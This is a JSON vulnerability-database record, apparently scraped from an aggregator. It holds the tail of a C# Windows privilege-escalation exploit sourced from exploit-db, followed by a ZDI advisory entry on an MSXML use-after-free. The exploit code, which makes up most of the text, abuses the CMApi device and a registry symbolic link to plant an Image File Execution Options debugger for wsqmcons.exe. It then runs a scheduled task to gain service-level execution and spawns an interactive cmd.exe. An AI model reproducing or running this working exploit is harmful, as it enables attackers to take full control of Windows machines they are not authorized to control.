Encoding.Unicode.GetBytes(target);\r\n StatusToNtException(NtSetValueKey(key, value_name, 0, RegistryKeyType.Link, data, data.Length));\r\n SafeRegistryHandle ret = key;\r\n key = null;\r\n return ret;\r\n }\r\n finally\r\n {\r\n if (key != null)\r\n {\r\n NtDeleteKey(key);\r\n }\r\n }\r\n }\r\n\r\n static RegistryKey CreateDeviceKey(string device_name)\r\n {\r\n using (SafeFileHandle handle = OpenFile(@\"\\Device\\DeviceApi\\CMApi\", FileAccessRights.Synchronize | FileAccessRights.GenericRead | FileAccessRights.GenericWrite,\r\n ShareMode.None, FileOpenOptions.NonDirectoryFile | FileOpenOptions.SynchronousIoNonAlert, false))\r\n {\r\n CmApiOpenKeyData data = new CmApiOpenKeyData(0x211, 1, device_name, GenericAccessRights.MaximumAllowed, true, 0, Marshal.SizeOf(typeof(CmApiOpenKeyResult)));\r\n CmApiOpenKeyResult result = DeviceIoControl<CmApiOpenKeyResult>(handle, 0x47085B, data);\r\n StatusToNtException(result.status);\r\n return RegistryKey.FromHandle(new SafeRegistryHandle(new IntPtr(result.handle), true));\r\n }\r\n }\r\n\r\n\r\n public enum TokenInformationClass\r\n {\r\n TokenSessionId = 12\r\n }\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtClose(IntPtr handle);\r\n\r\n [DllImport(\"ntdll.dll\", CharSet = CharSet.Unicode)]\r\n public static extern int NtOpenProcessTokenEx(\r\n IntPtr ProcessHandle,\r\n GenericAccessRights DesiredAccess,\r\n AttributeFlags HandleAttributes,\r\n out IntPtr TokenHandle);\r\n\r\n public sealed class SafeKernelObjectHandle\r\n : SafeHandleZeroOrMinusOneIsInvalid\r\n {\r\n public SafeKernelObjectHandle()\r\n : base(true)\r\n {\r\n }\r\n\r\n public SafeKernelObjectHandle(IntPtr handle, bool owns_handle)\r\n : base(owns_handle)\r\n {\r\n SetHandle(handle);\r\n }\r\n\r\n protected override bool ReleaseHandle()\r\n {\r\n if (!IsInvalid)\r\n {\r\n NtClose(this.handle);\r\n this.handle = IntPtr.Zero;\r\n return true;\r\n }\r\n return false;\r\n }\r\n }\r\n\r\n public enum TokenType\r\n {\r\n Primary = 1,\r\n Impersonation = 2\r\n }\r\n\r\n [DllImport(\"ntdll.dll\", CharSet = CharSet.Unicode)]\r\n public static extern int NtDuplicateToken(\r\n IntPtr ExistingTokenHandle,\r\n GenericAccessRights DesiredAccess,\r\n ObjectAttributes ObjectAttributes,\r\n bool EffectiveOnly,\r\n TokenType TokenType,\r\n out IntPtr NewTokenHandle\r\n );\r\n\r\n public static SafeKernelObjectHandle DuplicateToken(SafeKernelObjectHandle existing_token)\r\n {\r\n IntPtr new_token;\r\n\r\n using (ObjectAttributes obja = new ObjectAttributes(null, AttributeFlags.None))\r\n {\r\n StatusToNtException(NtDuplicateToken(existing_token.DangerousGetHandle(),\r\n GenericAccessRights.MaximumAllowed, obja, false, TokenType.Primary, out new_token));\r\n return new SafeKernelObjectHandle(new_token, true);\r\n }\r\n }\r\n\r\n public static SafeKernelObjectHandle OpenProcessToken()\r\n {\r\n IntPtr new_token;\r\n StatusToNtException(NtOpenProcessTokenEx(new IntPtr(-1),\r\n GenericAccessRights.MaximumAllowed, AttributeFlags.None, out new_token));\r\n using (SafeKernelObjectHandle ret = new SafeKernelObjectHandle(new_token, true))\r\n {\r\n return DuplicateToken(ret);\r\n }\r\n }\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtSetInformationToken(\r\n SafeKernelObjectHandle TokenHandle,\r\n TokenInformationClass TokenInformationClass,\r\n byte[] TokenInformation,\r\n int TokenInformationLength);\r\n\r\n public static void SetTokenSessionId(SafeKernelObjectHandle token, int session_id)\r\n {\r\n byte[] buffer = BitConverter.GetBytes(session_id);\r\n NtSetInformationToken(token, TokenInformationClass.TokenSessionId,\r\n buffer, buffer.Length);\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n struct STARTUPINFO\r\n {\r\n public Int32 cb;\r\n public string lpReserved;\r\n public string lpDesktop;\r\n public string lpTitle;\r\n public Int32 dwX;\r\n public Int32 dwY;\r\n public Int32 dwXSize;\r\n public Int32 dwYSize;\r\n public Int32 dwXCountChars;\r\n public Int32 dwYCountChars;\r\n public Int32 dwFillAttribute;\r\n public Int32 dwFlags;\r\n public Int16 wShowWindow;\r\n public Int16 cbReserved2;\r\n public IntPtr lpReserved2;\r\n public IntPtr hStdInput;\r\n public IntPtr hStdOutput;\r\n public IntPtr hStdError;\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n internal struct PROCESS_INFORMATION\r\n {\r\n public IntPtr hProcess;\r\n public IntPtr hThread;\r\n public int dwProcessId;\r\n public int dwThreadId;\r\n }\r\n\r\n enum CreateProcessFlags\r\n {\r\n CREATE_BREAKAWAY_FROM_JOB = 0x01000000,\r\n CREATE_DEFAULT_ERROR_MODE = 0x04000000,\r\n CREATE_NEW_CONSOLE = 0x00000010,\r\n CREATE_NEW_PROCESS_GROUP = 0x00000200,\r\n CREATE_NO_WINDOW = 0x08000000,\r\n CREATE_PROTECTED_PROCESS = 0x00040000,\r\n CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,\r\n CREATE_SEPARATE_WOW_VDM = 0x00000800,\r\n CREATE_SHARED_WOW_VDM = 0x00001000,\r\n CREATE_SUSPENDED = 0x00000004,\r\n CREATE_UNICODE_ENVIRONMENT = 0x00000400,\r\n DEBUG_ONLY_THIS_PROCESS = 0x00000002,\r\n DEBUG_PROCESS = 0x00000001,\r\n DETACHED_PROCESS = 0x00000008,\r\n EXTENDED_STARTUPINFO_PRESENT = 0x00080000,\r\n INHERIT_PARENT_AFFINITY = 0x00010000\r\n }\r\n\r\n [DllImport(\"advapi32.dll\", SetLastError = true, CharSet = CharSet.Auto)]\r\n static extern bool CreateProcessAsUser(\r\n IntPtr hToken,\r\n string lpApplicationName,\r\n string lpCommandLine,\r\n IntPtr lpProcessAttributes,\r\n IntPtr lpThreadAttributes,\r\n bool bInheritHandles,\r\n CreateProcessFlags dwCreationFlags,\r\n IntPtr lpEnvironment,\r\n string lpCurrentDirectory,\r\n ref STARTUPINFO lpStartupInfo,\r\n out PROCESS_INFORMATION lpProcessInformation);\r\n\r\n static void SpawnInteractiveCmd(int sessionid)\r\n { \r\n SafeKernelObjectHandle token = OpenProcessToken();\r\n SetTokenSessionId(token, sessionid);\r\n\r\n STARTUPINFO startInfo = new STARTUPINFO();\r\n startInfo.cb = Marshal.SizeOf(startInfo);\r\n PROCESS_INFORMATION procInfo;\r\n\r\n CreateProcessAsUser(token.DangerousGetHandle(), null, \"cmd.exe\",\r\n IntPtr.Zero, IntPtr.Zero, false, CreateProcessFlags.CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref startInfo, out procInfo);\r\n }\r\n \r\n static bool DoExploit()\r\n {\r\n SafeRegistryHandle symbolic_link = null;\r\n \r\n try\r\n {\r\n string device_name = FindFirstAccessibleDevice();\r\n if (device_name != null)\r\n {\r\n Console.WriteLine(\"[SUCCESS]: Found Device: {0}\", device_name);\r\n }\r\n else\r\n {\r\n throw new ArgumentException(\"Couldn't find a valid device\");\r\n }\r\n\r\n using (RegistryKey key = CreateDeviceKey(device_name))\r\n {\r\n StatusToNtException(NtDeleteKey(key.Handle));\r\n }\r\n\r\n Console.WriteLine(\"[SUCCESS]: Deleted leaf key\");\r\n\r\n using (RegistryKey profile_key = OpenProfileKey(null))\r\n { \r\n symbolic_link = CreateSymbolicLink(profile_key.Handle, device_name, \r\n @\"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\wsqmcons.exe\");\r\n }\r\n\r\n Console.WriteLine(\"[SUCCESS]: Created symbolic link\");\r\n using (RegistryKey key = CreateDeviceKey(device_name))\r\n {\r\n key.SetValue(\"Debugger\", String.Format(\"\\\"{0}\\\" {1}\", Assembly.GetCallingAssembly().Location, GetSessionId()));\r\n Console.WriteLine(\"[SUCCESS]: Created IFEO key\");\r\n EventWaitHandle ev = new EventWaitHandle(false, EventResetMode.AutoReset, @\"Global\\{376693BE-1931-4AF9-8D56-C629F9094745}\");\r\n Process p = Process.Start(\"schtasks\", @\"/Run /TN \"\"\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\"\"\");\r\n ev.WaitOne();\r\n\r\n NtDeleteKey(key.Handle);\r\n } \r\n }\r\n catch (Exception ex)\r\n {\r\n Console.WriteLine(\"[ERROR]: {0}\", ex.Message);\r\n }\r\n finally\r\n {\r\n if (symbolic_link != null)\r\n {\r\n NtDeleteKey(symbolic_link);\r\n }\r\n }\r\n return false;\r\n } \r\n \r\n static int GetSessionId()\r\n {\r\n using (Process p = Process.GetCurrentProcess())\r\n {\r\n return p.SessionId;\r\n }\r\n } \r\n \r\n static void Main(string[] args)\r\n { \r\n if (GetSessionId() > 0)\r\n {\r\n DoExploit();\r\n }\r\n else\r\n {\r\n Console.WriteLine(\"[SUCCESS]: Running as service\");\r\n EventWaitHandle ev = EventWaitHandle.OpenExisting(@\"Global\\{376693BE-1931-4AF9-8D56-C629F9094745}\", EventWaitHandleRights.Modify);\r\n ev.Set();\r\n if (args.Length > 1)\r\n {\r\n int session_id;\r\n if (!int.TryParse(args[0], out session_id))\r\n {\r\n session_id = 0;\r\n }\r\n SpawnInteractiveCmd(session_id);\r\n }\r\n }\r\n }\r\n }\r\n}", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40573/"}], "zdi": [{"lastseen": "2020-06-22T11:41:29", "bulletinFamily": "info", "cvelist": ["CVE-2016-3376"], "edition": 3, "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within MSXML. By performing actions in script, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "modified": "2016-06-22T00:00:00", "published": "2016-09-16T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-16-512/", "id": "ZDI-16-512", "title": "Microsoft Windows MSXML IDispatch Use-After-Free Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}